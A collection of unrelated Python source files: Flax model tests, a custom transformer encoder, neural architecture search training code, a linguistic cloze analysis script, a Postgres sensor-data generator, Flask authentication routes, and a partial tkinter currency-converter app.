for model_class in self.all_model_classes:
with self.subTest(model_class.__name__):
# prepare inputs
prepared_inputs_dict = self._prepare_for_class(inputs_dict, model_class)
pt_inputs = {k: torch.tensor(v.tolist()) for k, v in prepared_inputs_dict.items()}
# load corresponding PyTorch class
pt_model_class_name = model_class.__name__[4:] # Skip the "Flax" at the beginning
pt_model_class = getattr(transformers, pt_model_class_name)
pt_model = pt_model_class(config).eval()
# Flax models don't use the `use_cache` option and cache is not returned as a default.
# So we disable `use_cache` here for PyTorch model.
pt_model.config.use_cache = False
fx_model = model_class(config, dtype=jnp.float32)
pt_model = load_flax_weights_in_pytorch_model(pt_model, fx_model.params)
# make sure weights are tied in PyTorch
pt_model.tie_weights()
with torch.no_grad():
pt_outputs = pt_model(**pt_inputs).to_tuple()
fx_outputs = fx_model(**prepared_inputs_dict).to_tuple()
self.assertEqual(len(fx_outputs), len(pt_outputs), "Output lengths differ between Flax and PyTorch")
for fx_output, pt_output in zip(fx_outputs, pt_outputs):
self.assert_almost_equals(fx_output, pt_output.numpy(), 4e-2)
with tempfile.TemporaryDirectory() as tmpdirname:
fx_model.save_pretrained(tmpdirname)
pt_model_loaded = pt_model_class.from_pretrained(tmpdirname, from_flax=True)
with torch.no_grad():
pt_outputs_loaded = pt_model_loaded(**pt_inputs).to_tuple()
self.assertEqual(
len(fx_outputs), len(pt_outputs_loaded), "Output lengths differ between Flax and PyTorch"
)
for fx_output, pt_output in zip(fx_outputs, pt_outputs_loaded):
self.assert_almost_equals(fx_output, pt_output.numpy(), 4e-2)
def test_from_pretrained_save_pretrained(self):
config, inputs_dict = self.model_tester.prepare_config_and_inputs_for_common()
for model_class in self.all_model_classes:
with self.subTest(model_class.__name__):
model = model_class(config)
prepared_inputs_dict = self._prepare_for_class(inputs_dict, model_class)
outputs = model(**prepared_inputs_dict).to_tuple()
# verify that normal save_pretrained works as expected
with tempfile.TemporaryDirectory() as tmpdirname:
model.save_pretrained(tmpdirname)
model_loaded = model_class.from_pretrained(tmpdirname)
outputs_loaded = model_loaded(**prepared_inputs_dict).to_tuple()
for output_loaded, output in zip(outputs_loaded, outputs):
self.assert_almost_equals(output_loaded, output, 1e-3)
# verify that save_pretrained for distributed training
# with `params=params` works as expected
with tempfile.TemporaryDirectory() as tmpdirname:
model.save_pretrained(tmpdirname, params=model.params)
model_loaded = model_class.from_pretrained(tmpdirname)
outputs_loaded = model_loaded(**prepared_inputs_dict).to_tuple()
for output_loaded, output in zip(outputs_loaded, outputs):
self.assert_almost_equals(output_loaded, output, 1e-3)
def test_save_load_from_base(self):
config, _ = self.model_tester.prepare_config_and_inputs_for_common()
base_class = FLAX_MODEL_MAPPING[config.__class__]
for model_class in self.all_model_classes:
if model_class == base_class:
continue
model = base_class(config)
base_params = flatten_dict(unfreeze(model.params))
# check that all base model weights are loaded correctly
with tempfile.TemporaryDirectory() as tmpdirname:
model.save_pretrained(tmpdirname)
head_model = model_class.from_pretrained(tmpdirname)
base_param_from_head = flatten_dict(unfreeze(head_model.params[head_model.base_model_prefix]))
for key in base_param_from_head.keys():
max_diff = (base_params[key] - base_param_from_head[key]).sum().item()
self.assertLessEqual(max_diff, 1e-3, msg=f"{key} not identical")
def test_save_load_to_base(self):
config, _ = self.model_tester.prepare_config_and_inputs_for_common()
base_class = FLAX_MODEL_MAPPING[config.__class__]
for model_class in self.all_model_classes:
if model_class == base_class:
continue
model = model_class(config)
base_params_from_head = flatten_dict(unfreeze(model.params[model.base_model_prefix]))
# check that all base model weights are loaded correctly
with tempfile.TemporaryDirectory() as tmpdirname:
model.save_pretrained(tmpdirname)
base_model = base_class.from_pretrained(tmpdirname)
base_params = flatten_dict(unfreeze(base_model.params))
for key in base_params_from_head.keys():
max_diff = (base_params[key] - base_params_from_head[key]).sum().item()
self.assertLessEqual(max_diff, 1e-3, msg=f"{key} not identical")
@is_pt_flax_cross_test
def test_save_load_from_base_pt(self):
config, _ = self.model_tester.prepare_config_and_inputs_for_common()
base_class = FLAX_MODEL_MAPPING[config.__class__]
for model_class in self.all_model_classes:
if model_class == base_class:
continue
model = base_class(config)
base_params = flatten_dict(unfreeze(model.params))
# convert Flax model to PyTorch model
pt_model_class = getattr(transformers, base_class.__name__[4:]) # Skip the "Flax" at the beginning
pt_model = pt_model_class(config).eval()
pt_model = load_flax_weights_in_pytorch_model(pt_model, model.params)
# check that all base model weights are loaded correctly
with tempfile.TemporaryDirectory() as tmpdirname:
# save pt model
pt_model.save_pretrained(tmpdirname)
head_model = model_class.from_pretrained(tmpdirname, from_pt=True)
base_param_from_head = flatten_dict(unfreeze(head_model.params[head_model.base_model_prefix]))
for key in base_param_from_head.keys():
max_diff = (base_params[key] - base_param_from_head[key]).sum().item()
self.assertLessEqual(max_diff, 1e-3, msg=f"{key} not identical")
@is_pt_flax_cross_test
def test_save_load_to_base_pt(self):
config, _ = self.model_tester.prepare_config_and_inputs_for_common()
base_class = FLAX_MODEL_MAPPING[config.__class__]
for model_class in self.all_model_classes:
if model_class == base_class:
continue
model = model_class(config)
base_params_from_head = flatten_dict(unfreeze(model.params[model.base_model_prefix]))
# convert Flax model to PyTorch model
pt_model_class = getattr(transformers, model_class.__name__[4:]) # Skip the "Flax" at the beginning
pt_model = pt_model_class(config).eval()
pt_model = load_flax_weights_in_pytorch_model(pt_model, model.params)
# check that all base model weights are loaded correctly
with tempfile.TemporaryDirectory() as tmpdirname:
pt_model.save_pretrained(tmpdirname)
base_model = base_class.from_pretrained(tmpdirname, from_pt=True)
base_params = flatten_dict(unfreeze(base_model.params))
for key in base_params_from_head.keys():
max_diff = (base_params[key] - base_params_from_head[key]).sum().item()
self.assertLessEqual(max_diff, 1e-3, msg=f"{key} not identical")
@slow
def test_jit_compilation(self):
config, inputs_dict = self.model_tester.prepare_config_and_inputs_for_common()
for model_class in self.all_model_classes:
with self.subTest(model_class.__name__):
prepared_inputs_dict = self._prepare_for_class(inputs_dict, model_class)
model = model_class(config)
@jax.jit
def model_jitted(input_ids, attention_mask=None, **kwargs):
return model(input_ids=input_ids, attention_mask=attention_mask, **kwargs)
with self.subTest("JIT Enabled"):
jitted_outputs = model_jitted(**prepared_inputs_dict).to_tuple()
with self.subTest("JIT Disabled"):
with jax.disable_jit():
outputs = model_jitted(**prepared_inputs_dict).to_tuple()
self.assertEqual(len(outputs), len(jitted_outputs))
for jitted_output, output in zip(jitted_outputs, outputs):
self.assertEqual(jitted_output.shape, output.shape)
def test_forward_signature(self):
config, _ = self.model_tester.prepare_config_and_inputs_for_common()
for model_class in self.all_model_classes:
model = model_class(config)
signature = inspect.signature(model.__call__)
# signature.parameters is an OrderedDict => so arg_names order is deterministic
arg_names = [*signature.parameters.keys()]
if model.config.is_encoder_decoder:
expected_arg_names = [
"input_ids",
"attention_mask",
"decoder_input_ids",
"decoder_attention_mask",
]
self.assertListEqual(arg_names[: len(expected_arg_names)], expected_arg_names)
else:
expected_arg_names = ["input_ids", "attention_mask"]
self.assertListEqual(arg_names[:2], expected_arg_names)
def test_naming_convention(self):
for model_class in self.all_model_classes:
model_class_name = model_class.__name__
module_class_name = (
model_class_name[:-5] + "Module" if model_class_name[-5:] == "Model" else model_class_name + "Module"
)
bert_modeling_flax_module = __import__(model_class.__module__, fromlist=[module_class_name])
module_cls = getattr(bert_modeling_flax_module, module_class_name)
self.assertIsNotNone(module_cls)
def test_hidden_states_output(self):
def check_hidden_states_output(inputs_dict, config, model_class):
model = model_class(config)
outputs = model(**self._prepare_for_class(inputs_dict, model_class))
hidden_states = outputs.encoder_hidden_states if config.is_encoder_decoder else outputs.hidden_states
expected_num_layers = getattr(
self.model_tester, "expected_num_hidden_layers", self.model_tester.num_hidden_layers + 1
)
self.assertEqual(len(hidden_states), expected_num_layers)
if hasattr(self.model_tester, "encoder_seq_length"):
seq_length = self.model_tester.encoder_seq_length
else:
seq_length = self.model_tester.seq_length
self.assertListEqual(
list(hidden_states[0].shape[-2:]),
[seq_length, self.model_tester.hidden_size],
)
if config.is_encoder_decoder:
hidden_states = outputs.decoder_hidden_states
self.assertIsInstance(hidden_states, (list, tuple))
self.assertEqual(len(hidden_states), expected_num_layers)
seq_len = getattr(self.model_tester, "seq_length", None)
decoder_seq_length = getattr(self.model_tester, "decoder_seq_length", seq_len)
self.assertListEqual(
list(hidden_states[0].shape[-2:]),
[decoder_seq_length, self.model_tester.hidden_size],
)
config, inputs_dict = self.model_tester.prepare_config_and_inputs_for_common()
for model_class in self.all_model_classes:
inputs_dict["output_hidden_states"] = True
check_hidden_states_output(inputs_dict, config, model_class)
# check that output_hidden_states also work using config
del inputs_dict["output_hidden_states"]
config.output_hidden_states = True
check_hidden_states_output(inputs_dict, config, model_class)
def test_attention_outputs(self):
config, inputs_dict = self.model_tester.prepare_config_and_inputs_for_common()
config.return_dict = True
seq_length = getattr(self.model_tester, "seq_length", None)
decoder_seq_length = getattr(self.model_tester, "decoder_seq_length", seq_length)
encoder_seq_length = getattr(self.model_tester, "encoder_seq_length", seq_length)
decoder_key_length = getattr(self.model_tester, "decoder_key_length", decoder_seq_length)
encoder_key_length = getattr(self.model_tester, "key_length", encoder_seq_length)
for model_class in self.all_model_classes:
inputs_dict["output_attentions"] = True
inputs_dict["output_hidden_states"] = False
model = model_class(config)
outputs = model(**self._prepare_for_class(inputs_dict, model_class))
attentions = outputs.encoder_attentions if config.is_encoder_decoder else outputs.attentions
self.assertEqual(len(attentions), self.model_tester.num_hidden_layers)
# check that output_attentions also work using config
del inputs_dict["output_attentions"]
config.output_attentions = True
model = model_class(config)
outputs = model(**self._prepare_for_class(inputs_dict, model_class))
attentions = outputs.encoder_attentions if config.is_encoder_decoder else outputs.attentions
self.assertEqual(len(attentions), self.model_tester.num_hidden_layers)
self.assertListEqual(
list(attentions[0].shape[-3:]),
[self.model_tester.num_attention_heads, encoder_seq_length, encoder_key_length],
)
out_len = len(outputs)
if self.is_encoder_decoder:
correct_outlen = 5
# Question Answering model returns start_logits and end_logits
if model_class in get_values(FLAX_MODEL_FOR_QUESTION_ANSWERING_MAPPING):
correct_outlen += 1 # start_logits and end_logits instead of only 1 output
self.assertEqual(out_len, correct_outlen)
# decoder attentions
decoder_attentions = outputs.decoder_attentions
self.assertIsInstance(decoder_attentions, (list, tuple))
self.assertEqual(len(decoder_attentions), self.model_tester.num_hidden_layers)
self.assertListEqual(
list(decoder_attentions[0].shape[-3:]),
[self.model_tester.num_attention_heads, decoder_seq_length, decoder_key_length],
)
# cross attentions
cross_attentions = outputs.cross_attentions
self.assertIsInstance(cross_attentions, (list, tuple))
self.assertEqual(len(cross_attentions), self.model_tester.num_hidden_layers)
self.assertListEqual(
list(cross_attentions[0].shape[-3:]),
[
self.model_tester.num_attention_heads,
decoder_seq_length,
encoder_key_length,
],
)
# Check attention is always last and order is fine
inputs_dict["output_attentions"] = True
inputs_dict["output_hidden_states"] = True
model = model_class(config)
outputs = model(**self._prepare_for_class(inputs_dict, model_class))
if hasattr(self.model_tester, "num_hidden_states_types"):
added_hidden_states = self.model_tester.num_hidden_states_types
elif self.is_encoder_decoder:
added_hidden_states = 2
else:
added_hidden_states = 1
self.assertEqual(out_len + added_hidden_states, len(outputs))
self_attentions = outputs.encoder_attentions if config.is_encoder_decoder else outputs.attentions
self.assertEqual(len(self_attentions), self.model_tester.num_hidden_layers)
self.assertListEqual(
list(self_attentions[0].shape[-3:]),
[self.model_tester.num_attention_heads, encoder_seq_length, encoder_key_length],
)
def test_load_with_mismatched_shapes(self):
config, inputs_dict = self.model_tester.prepare_config_and_inputs_for_common()
for model_class in self.all_model_classes:
if model_class not in get_values(FLAX_MODEL_FOR_SEQUENCE_CLASSIFICATION_MAPPING):
continue
with self.subTest(msg=f"Testing {model_class}"):
with tempfile.TemporaryDirectory() as tmp_dir:
model = model_class(config)
model.save_pretrained(tmp_dir)
# Fails when we don't set ignore_mismatched_sizes=True
with self.assertRaises(ValueError):
new_model = FlaxAutoModelForSequenceClassification.from_pretrained(tmp_dir, num_labels=42)
logger = logging.get_logger("transformers.modeling_flax_utils")
with CaptureLogger(logger) as cl:
new_model = FlaxAutoModelForSequenceClassification.from_pretrained(
tmp_dir, num_labels=42, ignore_mismatched_sizes=True
)
self.assertIn("the shapes did not match", cl.out)
logits = new_model(**inputs_dict)["logits"]
self.assertEqual(logits.shape[1], 42)
@require_flax
@is_staging_test
class FlaxModelPushToHubTester(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls._api = HfApi(endpoint=ENDPOINT_STAGING)
cls._token = cls._api.login(username=USER, password=PASS)
@classmethod
def tearDownClass(cls):
try:
cls._api.delete_repo(token=cls._token, name="test-model-flax")
except HTTPError:
pass
try:
cls._api.delete_repo(token=cls._token, name="test-model-flax-org", organization="valid_org")
except HTTPError:
pass
def test_push_to_hub(self):
config = BertConfig(
vocab_size=99, hidden_size=32, num_hidden_layers=5, num_attention_heads=4, intermediate_size=37
)
model = FlaxBertModel(config)
with tempfile.TemporaryDirectory() as tmp_dir:
model.save_pretrained(
os.path.join(tmp_dir, "test-model-flax"), push_to_hub=True, use_auth_token=self._token
)
new_model = FlaxBertModel.from_pretrained(f"{USER}/test-model-flax")
base_params = flatten_dict(unfreeze(model.params))
new_params = flatten_dict(unfreeze(new_model.params))
for key in base_params.keys():
max_diff = (base_params[key] - new_params[key]).sum().item()
self.assertLessEqual(max_diff, 1e-3, msg=f"{key} not identical")
def test_push_to_hub_in_organization(self):
config = BertConfig(
vocab_size=99, hidden_size=32, num_hidden_layers=5, num_attention_heads=4, intermediate_size=37
)
model = FlaxBertModel(config)
with tempfile.TemporaryDirectory() as tmp_dir:
model.save_pretrained(
os.path.join(tmp_dir, "test-model-flax-org"),
push_to_hub=True,
use_auth_token=self._token,
organization="valid_org",
)
new_model = FlaxBertModel.from_pretrained("valid_org/test-model-flax-org")
base_params = flatten_dict(unfreeze(model.params))
new_params = flatten_dict(unfreeze(new_model.params))
for key in base_params.keys():
max_diff = (base_params[key] - new_params[key]).sum().item()
self.assertLessEqual(max_diff, 1e-3, msg=f"{key} not identical")
|
import torch
from torch import nn
from .attention import CustomMultiHeadAttention
from .blocks import PositionwiseFeedForward, CustomLayerNorm
from .position_layers import PositionEncoding
class CustomEncoderLayer(nn.Module):
def __init__(self, dim, n_head, ffn_hidden=None, dropout=0.0):
"""
Encoder block
:param dim: Embedding dimension
:param n_head: Number of head in multi head attention
:param ffn_hidden: Number of hidden nodes of feed forward layer
:param dropout: Dropout rate in the block
"""
super(CustomEncoderLayer, self).__init__()
self.multiheadatt = CustomMultiHeadAttention(dim, n_head)
self.norm1 = CustomLayerNorm(dim)
self.dropout1 = nn.Dropout(p=dropout)
self.ffn = PositionwiseFeedForward(dim, ffn_hidden, dropout=dropout)
self.norm2 = CustomLayerNorm(dim)
self.dropout2 = nn.Dropout(p=dropout)
def forward(self, x, mask=None):
# Compute attention
_x = x
x = self.multiheadatt(x, x, x, mask=mask)
# add norm
x = self.norm1(x + _x)
x = self.dropout1(x)
# feed forward
_x = x
x = self.ffn(x)
# add norm
x = self.norm2(x + _x)
x = self.dropout2(x)
return x
class CustomEncoder(nn.Module):
def __init__(self, vocab_size, max_len, dim, ffn_hidden, n_head, n_layers, dropout=0.1):
"""
Encoder (n x encode layer)
:param vocab_size: Input vocab size for embedding
:param max_len: Maximum length of position embedding
:param dim: Embedding dimension
:param ffn_hidden: Number of hidden nodes of feed forward layer
:param n_head: Number of head in multi head attention
:param n_layers: Number of repeated encoder layers
:param dropout: Dropout rate of encoder
"""
super(CustomEncoder, self).__init__()
self.embed = nn.Embedding(vocab_size, dim, padding_idx=1)
self.position = PositionEncoding(dim, dropout=dropout, max_len=max_len)
self.layers = nn.ModuleList([CustomEncoderLayer(dim,
n_head,
ffn_hidden,
dropout)
for _ in range(n_layers)])
def forward(self, x, mask=None):
x = self.embed(x)
x = self.position(x)
for layer in self.layers:
x = layer(x, mask)
return x
|
##################################################
# Copyright (c) Xuanyi Dong [GitHub D-X-Y], 2019 #
##################################################
import os, sys, time, torch
# modules in AutoDL
from log_utils import AverageMeter, time_string
from models import change_key
from .eval_funcs import obtain_accuracy
def get_flop_loss(expected_flop, flop_cur, flop_need, flop_tolerant):
expected_flop = torch.mean(expected_flop)
if flop_cur < flop_need - flop_tolerant: # Too Small FLOP
loss = -torch.log(expected_flop)
# elif flop_cur > flop_need + flop_tolerant: # Too Large FLOP
elif flop_cur > flop_need: # Too Large FLOP
loss = torch.log(expected_flop)
else: # Required FLOP
loss = None
if loss is None:
return 0, 0
else:
return loss, loss.item()
def search_train_v2(
search_loader,
network,
criterion,
scheduler,
base_optimizer,
arch_optimizer,
optim_config,
extra_info,
print_freq,
logger,
):
data_time, batch_time = AverageMeter(), AverageMeter()
base_losses, arch_losses, top1, top5 = (
AverageMeter(),
AverageMeter(),
AverageMeter(),
AverageMeter(),
)
arch_cls_losses, arch_flop_losses = AverageMeter(), AverageMeter()
epoch_str, flop_need, flop_weight, flop_tolerant = (
extra_info["epoch-str"],
extra_info["FLOP-exp"],
extra_info["FLOP-weight"],
extra_info["FLOP-tolerant"],
)
network.train()
logger.log(
"[Search] : {:}, FLOP-Require={:.2f} MB, FLOP-WEIGHT={:.2f}".format(
epoch_str, flop_need, flop_weight
)
)
end = time.time()
network.apply(change_key("search_mode", "search"))
for step, (base_inputs, base_targets, arch_inputs, arch_targets) in enumerate(
search_loader
):
scheduler.update(None, 1.0 * step / len(search_loader))
# calculate prediction and loss
base_targets = base_targets.cuda(non_blocking=True)
arch_targets = arch_targets.cuda(non_blocking=True)
# measure data loading time
data_time.update(time.time() - end)
# update the weights
base_optimizer.zero_grad()
logits, expected_flop = network(base_inputs)
base_loss = criterion(logits, base_targets)
base_loss.backward()
base_optimizer.step()
# record
prec1, prec5 = obtain_accuracy(logits.data, base_targets.data, topk=(1, 5))
base_losses.update(base_loss.item(), base_inputs.size(0))
top1.update(prec1.item(), base_inputs.size(0))
top5.update(prec5.item(), base_inputs.size(0))
# update the architecture
arch_optimizer.zero_grad()
logits, expected_flop = network(arch_inputs)
flop_cur = network.module.get_flop("genotype", None, None)
flop_loss, flop_loss_scale = get_flop_loss(
expected_flop, flop_cur, flop_need, flop_tolerant
)
acls_loss = criterion(logits, arch_targets)
arch_loss = acls_loss + flop_loss * flop_weight
arch_loss.backward()
arch_optimizer.step()
# record
arch_losses.update(arch_loss.item(), arch_inputs.size(0))
arch_flop_losses.update(flop_loss_scale, arch_inputs.size(0))
arch_cls_losses.update(acls_loss.item(), arch_inputs.size(0))
# measure elapsed time
batch_time.update(time.time() - end)
end = time.time()
if step % print_freq == 0 or (step + 1) == len(search_loader):
Sstr = (
"**TRAIN** "
+ time_string()
+ " [{:}][{:03d}/{:03d}]".format(epoch_str, step, len(search_loader))
)
Tstr = "Time {batch_time.val:.2f} ({batch_time.avg:.2f}) Data {data_time.val:.2f} ({data_time.avg:.2f})".format(
batch_time=batch_time, data_time=data_time
)
Lstr = "Base-Loss {loss.val:.3f} ({loss.avg:.3f}) Prec@1 {top1.val:.2f} ({top1.avg:.2f}) Prec@5 {top5.val:.2f} ({top5.avg:.2f})".format(
loss=base_losses, top1=top1, top5=top5
)
Vstr = "Acls-loss {aloss.val:.3f} ({aloss.avg:.3f}) FLOP-Loss {floss.val:.3f} ({floss.avg:.3f}) Arch-Loss {loss.val:.3f} ({loss.avg:.3f})".format(
aloss=arch_cls_losses, floss=arch_flop_losses, loss=arch_losses
)
logger.log(Sstr + " " + Tstr + " " + Lstr + " " + Vstr)
# num_bytes = torch.cuda.max_memory_allocated( next(network.parameters()).device ) * 1.0
# logger.log(Sstr + ' ' + Tstr + ' ' + Lstr + ' ' + Vstr + ' GPU={:.2f}MB'.format(num_bytes/1e6))
# Istr = 'Bsz={:} Asz={:}'.format(list(base_inputs.size()), list(arch_inputs.size()))
# logger.log(Sstr + ' ' + Tstr + ' ' + Lstr + ' ' + Vstr + ' ' + Istr)
# print(network.module.get_arch_info())
# print(network.module.width_attentions[0])
# print(network.module.width_attentions[1])
logger.log(
" **TRAIN** Prec@1 {top1.avg:.2f} Prec@5 {top5.avg:.2f} Error@1 {error1:.2f} Error@5 {error5:.2f} Base-Loss:{baseloss:.3f}, Arch-Loss={archloss:.3f}".format(
top1=top1,
top5=top5,
error1=100 - top1.avg,
error5=100 - top5.avg,
baseloss=base_losses.avg,
archloss=arch_losses.avg,
)
)
return base_losses.avg, arch_losses.avg, top1.avg, top5.avg
|
"""Second quick script to analyze the original method of evaluating agreement predictions."""
import os
import numpy as np
import pandas as pd
from tqdm import tqdm
from filenames import CLOZE_DIR, FEATURES_DIR, PROBABILITIES_DIR
cols = ["number", "gender", "case", "person"]
languages = os.listdir(PROBABILITIES_DIR)
for lg in ["hun", "gle", "fin"]: # already done
languages.remove(lg)
for lg in languages:
results = []
print(lg)
features_filename = os.path.join(FEATURES_DIR, f"{lg}.csv")
features = pd.read_csv(features_filename, dtype={"person": str})
cloze_filename = os.path.join(CLOZE_DIR, f"{lg}.csv")
cloze = pd.read_csv(cloze_filename)
for _, row in tqdm(cloze.iterrows()):
uid = row["uid"]
pos = row["pos"]
probabilities_filename = os.path.join(PROBABILITIES_DIR, lg, f"{uid}.csv")
try: # we may have skipped this cloze example
probs = pd.read_csv(probabilities_filename)
lemma = row["lemma"]
correct_form = row["correct_form"]
p_correct_form = probs[probs["word"] == correct_form]["p"].max()
if np.isnan(
p_correct_form
): # the correct form didn't appear in the lexicon
continue
else:
is_same_pos = features["pos"] == pos
is_different_lemma = features["lemma"] != lemma
other_lemmata = features[is_same_pos & is_different_lemma]
if (
other_lemmata.empty
): # we don't have feature data on any other lemmata
continue
else:
num_lemmata = len(other_lemmata["lemma"].unique())
merged = pd.merge(
probs, other_lemmata, left_on=["word"], right_on=["word"]
)
merged["correct"] = (merged[cols] == row[cols]).all(axis=1)
incorrect_forms = merged[~merged["correct"]]
lemmata = incorrect_forms["lemma"]
grouped = merged[merged["lemma"].isin(lemmata)].groupby("lemma")
count = 0
for _, group in grouped:
try:
p_correct = group[group["correct"]]["p"].max()
try:
p_incorrect = group[~group["correct"]]["p"].max()
if p_incorrect >= p_correct:
count += 1
except KeyError:
continue
except KeyError:
continue
example = {
"lg": lg,
"uid": uid,
"lemma": lemma,
"correct_form": correct_form,
"num_incorrect_lemmata": count,
"num_lemmata": num_lemmata,
}
results.append(example)
except FileNotFoundError:
continue
results = pd.DataFrame(results)
results["percentage"] = 100 * (
results["num_incorrect_lemmata"] / results["num_lemmata"]
)
results.to_csv(f"data/bylemmata/{lg}.csv", index=False)
|
import random
import os
from urllib.parse import urlparse, parse_qs
import psycopg2
import sys
import time
import yaml
def parse_conf(conf_path):
with open(conf_path, 'r') as f:
conf = yaml.load(f)
uri = conf['inputURI']
uri = uri[uri.find(':')+1:]
u = urlparse(uri)
query = parse_qs(u.query)
return u.path[1:], u.hostname, u.port, query['user'][0], query['password'][0], conf['table']
conf_path = os.path.dirname(os.path.realpath(__file__)) + '/../stream_sql.yaml'
if len(sys.argv) > 1:
conf_path = sys.argv[1]
dbname, host, port, user, password, table = parse_conf(conf_path)
conn = psycopg2.connect("dbname='postgres'" +
(" host='" + host + "'") +
(" port="+str(port) if port else "") +
(" user="+user if user else "") +
(" password="+password if password else ""))
cur = conn.cursor()
firmwares = ["0.2.4", "0.3.1", "0.3.2", "0.4"]
models = ["M101", "M104", "M204", "M205", "M404", "M606"]
devices = [random.randint(100, 10000) for i in range(0, 100)]
if 2040 in devices:
devices.remove(2040)
states = ["CA", "MA", "NY", "WY", "AR", "NV"]
print("Creating table...")
cur.execute("DROP TABLE IF EXISTS {0}; CREATE TABLE {0} ( reading_id bigint NOT NULL, device_id bigint NOT NULL, state varchar(2), model varchar(40), firmware_version varchar(40), temperature numeric, power_drain numeric, time bigint NOT NULL );".format(table))
print("...created!")
r = 0
while True:
print("Inserting data")
readings = 500
for i in range(0, int(readings)+random.randint(1, readings / 2)):
r += 1
d_id = random.choice(devices)
state = random.choice(states)
model = random.choice(models)
firmware_version = random.choice(firmwares)
power_drain = .2+.2*random.random()
if (state == "CA" and model == "M101" and firmware_version == "0.4"):
temperature = 2 + random.random()*10
else:
temperature = 70+random.random()*10
sql = "INSERT INTO %s VALUES ('%s', '%s', '%s', '%s', '%s', %f, %f, %d);" % (table, r, d_id, state, model, firmware_version, temperature, power_drain, time.time() * 1000)
cur.execute(sql)
d_id = 2040
state = random.choice(states)
model = random.choice(models)
firmware_version = random.choice(firmwares)
for i in range(0, int(readings*.01)+random.randint(1, readings / 2)):
r += 1
power_drain = .8 + random.random()*.2
if (state == "CA" and model == "M101" and firmware_version == "0.4"):
temperature = 2 + random.random()*10
else:
temperature = 70+random.random()*10
sql = "INSERT INTO %s VALUES ('%s', '%s', '%s', '%s', '%s', %f, %f, %d);" % (table, r, d_id, state, model, firmware_version, temperature, power_drain, time.time() * 1000)
cur.execute(sql)
conn.commit()
time.sleep(random.uniform(0.5, 2.5))
|
from flask import render_template,redirect,url_for, flash,request
from . import auth
from ..models import User,Blog,Comment
from .forms import RegistrationForm,LoginForm
from ..import db
from flask_login import login_user,logout_user,login_required
from ..email import mail_message
@auth.route('/register',methods = ["GET","POST"])
def register():
form = RegistrationForm()
if form.validate_on_submit():
user = User(email = form.email.data, username = form.username.data,password = form.password.data)
db.session.add(user)
db.session.commit()
mail_message("Welcome to Blog app","email/welcome_user",user.email,user=user)
return redirect(url_for('auth.login'))
title = "New Account"
return render_template('auth/register.html',registration_form = form)
@auth.route('/login',methods=['GET','POST'])
def login():
login_form = LoginForm()
if login_form.validate_on_submit():
user = User.query.filter_by(email = login_form.email.data).first()
if user is not None and user.verify_password(login_form.password.data):
login_user(user,login_form.remember.data)
return redirect(request.args.get('next') or url_for('main.index'))
flash('Invalid username or Password')
title = "blog login"
return render_template('auth/login.html',login_form = login_form,title=title)
@auth.route('/logout')
@login_required
def logout():
logout_user()
return redirect(url_for("main.index"))
|
#---import required modules
import requests
from tkinter import *
import tkinter as tk
from tkinter import ttk
from matplotlib.backends.backend_tkagg import (FigureCanvasTkAgg,NavigationToolbar2Tk)
from matplotlib.figure import Figure
import base64
import calc
from datetime import (datetime, date)
#----creating the main window----
root = Tk()
root.overrideredirect(True)
root.geometry('700x500+250+100')
root.attributes('-topmost', True)
lastClickX = 0
lastClickY = 0
#-----main code -----
def SaveLastClickPos(event):
global lastClickX, lastClickY
lastClickX = event.x
lastClickY = event.y
def Dragging(event):
x, y = event.x - lastClickX + root.winfo_x(), event.y - lastClickY + root.winfo_y()
root.geometry("+%s+%s" % (x , y))
#___conversion class___
class RealTimeCurrencyConverter():
def convert(self,inp_curr,out_curr,input_amount):
self.inp_code,ext1= map(str,inp_curr.split('-'))
self.out_code,ext2= map(str,out_curr.split('-'))
response_url = "https://api.ratesapi.io/api/latest?base={}&symbols={}".format(self.inp_code, self.out_code)
response = requests.get(response_url)
data = response.json()
rates = data['rates'][self.out_code]
self.output_amount = rates*float(input_amount)
return self.output_amount
#____ App class____
class App(tk.Tk):
def __init__(self):
#creating main window attributes
title_bar = Frame(root,bd=5,highlightthickness=0,bg="#2e2e2e")
title_bar.pack(expand=0, fill=X)
close_button = Button(title_bar, text='X', command=root.destroy,bg="#2e2e2e",padx=2,pady=2,activebackground='red',bd=0,font="bold",fg='white',highlightthickness=3)
close_button.pack(side=RIGHT)
l = Label(title_bar,text="CURRENCY CONVERTER ",font=('algerian', 10, "bold"),fg="white",bg="#2e2e2e")
l.pack(side="left")
value_out = StringVar()
value_in = StringVar()
amount = StringVar()
Var_1 = Button(root,text = "Currency Converter",activebackground="light blue",activeforeground="red",bd=3,padx=30,command = self.main ) #,state=DISABLED
Var_2 = Button(root,text = "Graphical analysis",activebackground="pink",bd=3,padx=30,command = self.graph)
Var_3 = Button(root,text = "OTHERS",activebackground="light blue",bd=3,padx=60,command = self.links) #,bg = "white"
Var_4 = Button(root,text = "ADMIN Login",bd=3,padx=45, command = self.var )
Var_1.place(x = 0 ,y = 55)
Var_2.place(x = 180,y = 55)
Var_3.place(x = 350,y = 55)
Var_4.place(x = 530,y = 55)
title_bar.bind('<Button-1>', SaveLastClickPos)
title_bar.bind('<B1-Motion>', Dragging)
def var(self): #driver code window attributes
self.uname = StringVar()
self.passw = StringVar()
self.canv = Canvas(height= 500,width = 700, bg="light blue")
self.canv.place(x =0,y = 85)
header = Label(self.canv, text = "ADMIN LOGIN", font = ('algerian', 20), bg="light blue")
header.place(x = 200,y = 100)
uname_lab = Label(self.canv, text = "User Name:", bg="light blue")
uname_lab.place(x = 100,y = 150)
uname_entry = Entry(self.canv,textvariable =self.uname)
uname_entry.place(x = 200,y = 150)
pass_lab = Label(self.canv, text = "Password:", bg="light blue")
pass_lab.place(x = 100,y = 200)
pass_entry = Entry(self.canv,show="*",textvariable =self.passw)
pass_entry.place(x = 200,y = 200)
login = Button(self.canv,text = "LOGIN",height=2,padx = 7,activebackground="#2C84EF",command = self.login)
login.place(x = 200,y = 250)
def links(self):# others
canv1 = Canvas(height= 500,width = 700, bg="light blue")
canv1.place(x =0,y = 85)
B = Button(canv1, text= "Calculator",padx = 50,font = 30,command = self.calc).place(x = 100,y = 200)
B1 = Button(canv1, text= "Trending",padx = 50,font = 30,command = self.ext).place(x = 100,y = 100)
def calc(self): #calculator
calc.app()
def graph(self):# graphical analysis inputs
self.canvx = Canvas(height =500,width = 700, bg="light blue")
self.canvx.place(x=0,y=85)
self.inpcode = StringVar()
self.outcode = StringVar()
self.date = StringVar()
inpl = Label(self.canvx,text = "Input Currency Code:",bg = "light blue").place(x = 100,y = 100)
inpb = Entry(self.canvx,textvariable = self.inpcode ).place(x = 300,y = 100)
outb = Entry(self.canvx,textvariable = self.outcode ).place(x = 300,y = 150)
